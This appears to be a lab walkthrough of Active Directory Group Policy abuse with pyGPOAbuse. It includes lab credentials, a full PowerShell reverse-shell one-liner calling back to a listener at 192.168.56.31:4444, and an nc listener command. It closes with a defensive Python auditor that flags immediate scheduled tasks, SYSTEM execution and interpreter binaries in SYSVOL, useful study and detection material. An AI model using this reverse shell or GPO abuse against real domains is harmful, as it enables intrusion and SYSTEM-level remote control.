# GPO abuse

* There is a GPO abuse path on the north domain (the GPO id is taken from BloodHound below)

<figure><img src="https://755243087-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FB2Dm6vWGbM7kQRITOyVl%2Fuploads%2FcGNvD3yHjjLSOM6eLmiA%2Fimage.png?alt=media&#x26;token=5026c3cc-298d-4b64-bbcb-4a5a9c8725f1" alt=""><figcaption></figcaption></figure>

* To abuse the GPO we use the pyGPOAbuse project by Hackndo: [pyGPOAbuse](https://github.com/Hackndo/pyGPOAbuse)
* The GitHub README says: *“It will create an immediate scheduled task as SYSTEM on the remote computer for computer GPO, or as logged in user for user GPO.”*

```bash
git clone https://github.com/Hackndo/pyGPOAbuse.git
cd pyGPOAbuse
python3 -m pip install virtualenv
python3 -m virtualenv .venv
source .venv/bin/activate
python3 -m pip install -r requirements.txt
```

We get the GPO id from BloodHound and launch the tool against it. Here we try to get a PowerShell reverse shell (the listener address in the command, 192.168.56.31, is the lab Parrot OS VM):

```bash
python3 pygpoabuse.py north.NewYork.local/miguel.cabrera:'ilovebaseball' -gpo-id "628D4237-8B4A-42C3-8599-66EB15352C43" -powershell -command "\$c = New-Object System.Net.Sockets.TCPClient('192.168.56.31',4444);\$s = \$c.GetStream();[byte[]]\$b = 0..65535|%{0};while((\$i = \$s.Read(\$b, 0, \$b.Length)) -ne 0){    \$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$b,0, \$i);    \$sb = (iex \$d 2>&1 | Out-String );    \$sb = ([text.encoding]::ASCII).GetBytes(\$sb + 'ps> ');    \$s.Write(\$sb,0,\$sb.Length);    \$s.Flush()};\$c.Close()" -taskname "MyTask" -description "You are done"
```

<figure><img src="https://755243087-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FB2Dm6vWGbM7kQRITOyVl%2Fuploads%2FsGhDFJQ75CrsdTxlqg3z%2Fimage.png?alt=media&#x26;token=109a8c81-3e7a-4349-8d48-1a1d898198db" alt=""><figcaption></figcaption></figure>

Catch the shell with a listener on port 4444; this needs to be done from the lab Parrot OS VM.

```bash
nc -nlvp 4444
```

A few moments later, once the target refreshes Group Policy and runs the immediate task, we get the PowerShell reverse shell.

<figure><img src="https://755243087-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FB2Dm6vWGbM7kQRITOyVl%2Fuploads%2FY3ffijPQnQvDcd8T9jxR%2Fimage.png?alt=media&#x26;token=ed98a9e3-f2e5-41d4-a082-8012a2caf413" alt=""><figcaption></figcaption></figure>
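On the defensive side, the artifact this leaves behind is the GPO's `ScheduledTasks.xml` under `Machine\Preferences\ScheduledTasks\` in SYSVOL, which is where the immediate task is written. The following audit script is an added example, not the page's or pyGPOAbuse's code; the sample XML is constructed in the Group Policy Preferences layout as I know it, with placeholder uid values and a placeholder command, and `audit_scheduled_tasks` and `SUSPICIOUS_BINARIES` are my own names.

```python
import xml.etree.ElementTree as ET

# Constructed sample in the Group Policy Preferences ScheduledTasks layout (as I know
# it); task name and description mirror the walkthrough, the command is a placeholder.
SAMPLE_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<ScheduledTasks clsid="{CC63F200-7309-4ba0-B154-A71CD118DBCC}">
  <ImmediateTaskV2 clsid="{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}" name="MyTask" uid="{PLACEHOLDER-1}">
    <Properties action="C" name="MyTask" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.3">
        <RegistrationInfo><Description>You are done</Description></RegistrationInfo>
        <Principals><Principal id="Author"><UserId>NT AUTHORITY\System</UserId>
          <RunLevel>HighestAvailable</RunLevel></Principal></Principals>
        <Actions Context="Author"><Exec><Command>powershell.exe</Command>
          <Arguments>-NoP -W Hidden -enc BASE64_PLACEHOLDER</Arguments></Exec></Actions>
      </Task>
    </Properties>
  </ImmediateTaskV2>
  <TaskV2 clsid="{D8896631-B747-47a7-84A6-C155337F3BC8}" name="NightlyBackup" uid="{PLACEHOLDER-2}">
    <Properties action="C" name="NightlyBackup" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.3"><Actions Context="Author"><Exec><Command>robocopy.exe</Command>
        <Arguments>C:\data D:\bak /MIR</Arguments></Exec></Actions></Task>
    </Properties>
  </TaskV2>
</ScheduledTasks>"""

# Interpreters and LOLBins that rarely belong in a legitimate immediate task.
SUSPICIOUS_BINARIES = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "rundll32.exe"}

def audit_scheduled_tasks(xml_text):
    """Return one finding per ImmediateTaskV2: identity, command and why it was flagged.
    Ordinary TaskV2 entries are ignored; immediate tasks run once at the next GPO
    refresh and are the artifact pyGPOAbuse-style abuse leaves in SYSVOL."""
    findings = []
    for task in ET.fromstring(xml_text).iter("ImmediateTaskV2"):
        props = task.find("Properties")
        exe = props.find("Task/Actions/Exec")
        command = exe.findtext("Command", "") if exe is not None else ""
        args = exe.findtext("Arguments", "") if exe is not None else ""
        reasons = ["immediate task"]
        if "system" in (props.get("runAs") or "").lower():
            reasons.append("runs as SYSTEM")
        if command.lower().rsplit("\\", 1)[-1] in SUSPICIOUS_BINARIES:
            reasons.append("interpreter/LOLBin command")
        if "-enc" in args.lower():
            reasons.append("encoded PowerShell argument")
        findings.append({"name": task.get("name"), "run_as": props.get("runAs"),
                         "command": f"{command} {args}".strip(),
                         "description": props.findtext("Task/RegistrationInfo/Description", ""),
                         "reasons": reasons})
    return findings
```

Run it over every `ScheduledTasks.xml` under `\\<domain>\SYSVOL\<domain>\Policies\{<GPO-ID>}\Machine\Preferences\ScheduledTasks\` (placeholders in angle brackets). Immediate tasks are rare in normal administration, so any finding is worth checking against who last modified that GPO.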
